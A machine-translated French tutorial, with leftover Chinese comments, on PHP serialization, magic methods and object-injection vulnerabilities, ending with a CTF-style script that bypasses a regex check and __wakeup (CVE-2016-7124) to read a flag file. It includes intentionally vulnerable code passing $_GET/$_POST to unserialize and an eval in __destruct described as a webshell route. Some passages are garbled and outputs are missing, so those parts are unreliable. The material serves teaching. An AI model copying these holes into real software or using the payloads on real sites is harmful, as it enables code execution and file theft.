Explication détaillée de la désérialisation php

1 Préface

Récemment, j'ai révisé le contenu que j'ai appris auparavant et je sens que j'ai une compréhension de la désérialisation PHP C'est plus profond, je vais donc le résumer ici

2 fonction serialize()

« Toutes les valeurs en php peuvent utiliser la fonction sérialiser () pour renvoyer un mot contenant Représenté par une chaîne de limitation. La sérialisation d'un objet enregistrera toutes les variables de l'objet, mais ne sauvegardera pas les méthodes de l'objet. Seul le nom de la classe sera enregistré. Ce concept peut être un peu déroutant au début. , mais ensuite j'ai compris

Lorsque l'exécution du programme se termine, les données de la mémoire seront immédiatement détruites. Les données stockées dans les variables sont les données de la mémoire et les fichiers. et les bases de données sont des "données persistantes", donc la séquence PHP Storage est le processus de "sauvegarde" des données variables en mémoire dans des données persistantes dans un fichier.

Recommandations d'apprentissage associées :

Programmation PHP de l'entrée à la maîtrise

 $s = serialize($变量); //该函数将变量数据进行序列化转换为字符串
 file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件

Apprenons la sérialisation à travers un exemple spécifique :

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39;is&#39;.$this->age.&#39;years old. <br />&#39;;
  }
}
//创建一个对象
$user = new User();
// 设置数据
$user->age = 20;
$user->name = &#39;daye&#39;;

//输出数据
$user->PrintData();
//输出序列化之后的数据
echo serialize($user);

?>

Voici le résultat :

Vous pouvez voir qu'après sérialisation d'un objet, toutes les variables de l'objet seront enregistrées, et on constate que le résultat sérialisé a un caractère , ces caractères sont des abréviations des lettres suivantes.

a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

Après avoir compris les lettres de type abréviation, vous pouvez obtenir le format de sérialisation PHP

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

Grâce à l'exemple ci-dessus, vous pouvez comprendre le concept de retour d'un flux d'octets via la fonction serialize(). chaîne de ce paragraphe.

3 La fonction unserialize()

opère sur une seule variable sérialisée et la reconvertit en une valeur PHP. Avant de désérialiser un objet, la classe de l'objet doit être définie avant la désérialisation.

unserialize() Pour faire simple, il s'agit du processus de restauration des données sérialisées stockées dans le fichier dans la représentation variable du code du programme et de restauration des résultats avant la sérialisation variable.

 $s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容（之前序列化过的字符串）
 $变量 = unserialize($s); //将该文本内容，反序列化到指定的变量中

Découvrez la désérialisation à travers un exemple :

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39; is &#39;.$this->age.&#39; years old. <br />&#39;;
  }
}
//重建对象
$user = unserialize(&#39;O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}&#39;);

$user->PrintData();

?>

Voici le résultat :

Remarque : Avant Lors de la désérialisation d'un objet, la classe de l'objet doit être définie avant la désérialisation. Sinon, une erreur sera signalée

4 Vulnérabilité de désérialisation PHP

Avant de découvrir la vulnérabilité, comprenons d'abord la fonction magique PHP, qui vous aidera à en savoir plus Cela vous sera utile

PHP réserve toutes les méthodes de classe commençant par __ (deux traits de soulignement) comme méthodes magiques

__construct  当一个对象创建时被调用，
__destruct  当一个对象销毁时被调用，
__toString  当一个对象被当作一个字符串被调用。
__wakeup()  使用unserialize时触发
__sleep()  使用serialize时触发
__destruct()  对象被销毁时触发
__call()  在对象上下文中调用不可访问的方法时触发
__callStatic()  在静态上下文中调用不可访问的方法时触发
__get()  用于从不可访问的属性读取数据
__set()  用于将数据写入不可访问的属性
__isset()  在不可访问的属性上调用isset()或empty()触发
__unset()   在不可访问的属性上使用unset()时触发
__toString()  把类当作字符串使用时触发,返回值需要为字符串
__invoke()  当脚本尝试将对象调用为函数时触发

Seule une partie des fonctions magiques est répertoriée ici,

Prenons un exemple pour comprendre le processus d'appel automatique de la fonction magique

<?php
class test{
 public $varr1="abc";
 public $varr2="123";
 public function echoP(){
 echo $this->varr1."<br>";
 }
 public function __construct(){
 echo "__construct<br>";
 }
 public function __destruct(){
 echo "__destruct<br>";
 }
 public function __toString(){
 return "__toString<br>";
 }
 public function __sleep(){
 echo "__sleep<br>";
 return array(&#39;varr1&#39;,&#39;varr2&#39;);
 }
 public function __wakeup(){
 echo "__wakeup<br>";
 }
}

$obj = new test(); //实例化对象，调用__construct()方法，输出__construct
$obj->echoP();  //调用echoP()方法，输出"abc"
echo $obj;  //obj对象被当做字符串输出，调用__toString()方法，输出__toString
$s =serialize($obj); //obj对象被序列化，调用__sleep()方法，输出__sleep
echo unserialize($s); //$s首先会被反序列化，会调用__wake()方法，被反序列化出来的对象又被当做字符串，就会调用_toString()方法。
// 脚本结束又会调用__destruct()方法，输出__destruct
?>

Voici le résultat :

Vous pouvez le voir clairement à travers cet exemple La fonction magique sera appelée lorsque les conditions correspondantes seront remplies.

5 Injection d'objet

Une vulnérabilité se produit lorsque la requête de l'utilisateur n'est pas correctement filtrée avant d'être transmise à la fonction de désérialisation unserialize(). Étant donné que PHP permet la sérialisation des objets, un attaquant pourrait soumettre une chaîne sérialisée spécifique à une fonction de désérialisation vulnérable, conduisant finalement à l'injection d'un objet PHP arbitraire dans le cadre de l'application.

Les vulnérabilités des objets doivent répondre à deux prérequis :

1. Les paramètres de non-sérialisation sont contrôlables.

2. Une classe contenant une méthode magique est définie dans le code, et certaines fonctions présentant des problèmes de sécurité utilisent des variables membres de la classe comme paramètres dans la méthode.

Ce qui suit est un exemple :

<?php
class A{
  var $test = "demo";
  function __destruct(){
      echo $this->test;
  }
}
$a = $_GET[&#39;test&#39;];
$a_unser = unserialize($a);
?>

Par exemple, dans cet exemple, le contenu généré par l'utilisateur est directement transmis à la fonction unserialize(), vous pouvez alors construire une telle instruction

?test=O:1:"A":1:{s:4:"test";s:5:"lemon";}

et exécutez-le dans le script. Après la fin, la fonction _destruct sera appelée et la variable de test sera écrasée pour produire du citron.

Après avoir découvert cette vulnérabilité, vous pouvez utiliser ce point de vulnérabilité pour contrôler les variables d'entrée et les fusionner dans un objet sérialisé.

Regardez un autre exemple :

<?php
class A{
  var $test = "demo";
  function __destruct(){
    @eval($this->test);//_destruct()函数中调用eval执行序列化对象中的语句
  }
}
$test = $_POST[&#39;test&#39;];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 构造序列化对象
$test_unser = unserialize($pp); // 反序列化同时触发_destruct函数
?>

En fait, si vous regardez attentivement, vous constaterez que nous construisons en fait l'objet sérialisé manuellement afin que la fonction unserialize() puisse déclencher le __destruc() fonction, puis exécutez-la dans_ Instructions malveillantes dans la fonction _destruc().

On peut donc utiliser cette vulnérabilité pour obtenir le web shell

6 Contourner la désérialisation de la fonction magique

contournement de la fonction magique wakeup()

PHP5<5.6.25
PHP7<7.0.10

Vulnérabilité de désérialisation PHP CVE-2016-7124

#a#重点：当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行

百度杯——Hash

其实仔细分析代码，只要我们能绕过两点即可得到f15g_1s_here.php的内容

    （1）绕过正则表达式对变量的检查
    （2）绕过_wakeup()魔法函数，因为如果我们反序列化的不是Gu3ss_m3_h2h2.php,这个魔法函数在反序列化时会触发并强制转成Gu3ss_m3_h2h2.php

那么问题就来了，如果绕过正则表达式
（1）/[oc]:\d+:/i，例如：o:4:这样就会被匹配到,而绕过也很简单，只需加上一个+,这个正则表达式即匹配不到0:+4:

（2）绕过_wakeup()魔法函数，上面提到了当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 _wakeup 函数的执行

编写php序列化脚本

<?php
class Demo {
  private $file = &#39;Gu3ss_m3_h2h2.php&#39;;

  public function __construct($file) {
    $this->file = $file;
  }

  function __destruct() {
    echo @highlight_file($this->file, true);
  }

  function __wakeup() {
    if ($this->file != &#39;Gu3ss_m3_h2h2.php&#39;) {
      //the secret is in the f15g_1s_here.php
      $this->file = &#39;Gu3ss_m3_h2h2.php&#39;;
    }
  }
}
#先创建一个对象，自动调用__construct魔法函数
$obj = new Demo(&#39;f15g_1s_here.php&#39;);
#进行序列化
$a = serialize($obj);
#使用str_replace() 函数进行替换，来绕过正则表达式的检查
$a = str_replace(&#39;O:4:&#39;,&#39;O:+4:&#39;,$a);
#使用str_replace() 函数进行替换，来绕过__wakeup()魔法函数
$a = str_replace(&#39;:1:&#39;,&#39;:2:&#39;,$a);
#再进行base64编码
echo base64_encode($a);
?>

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!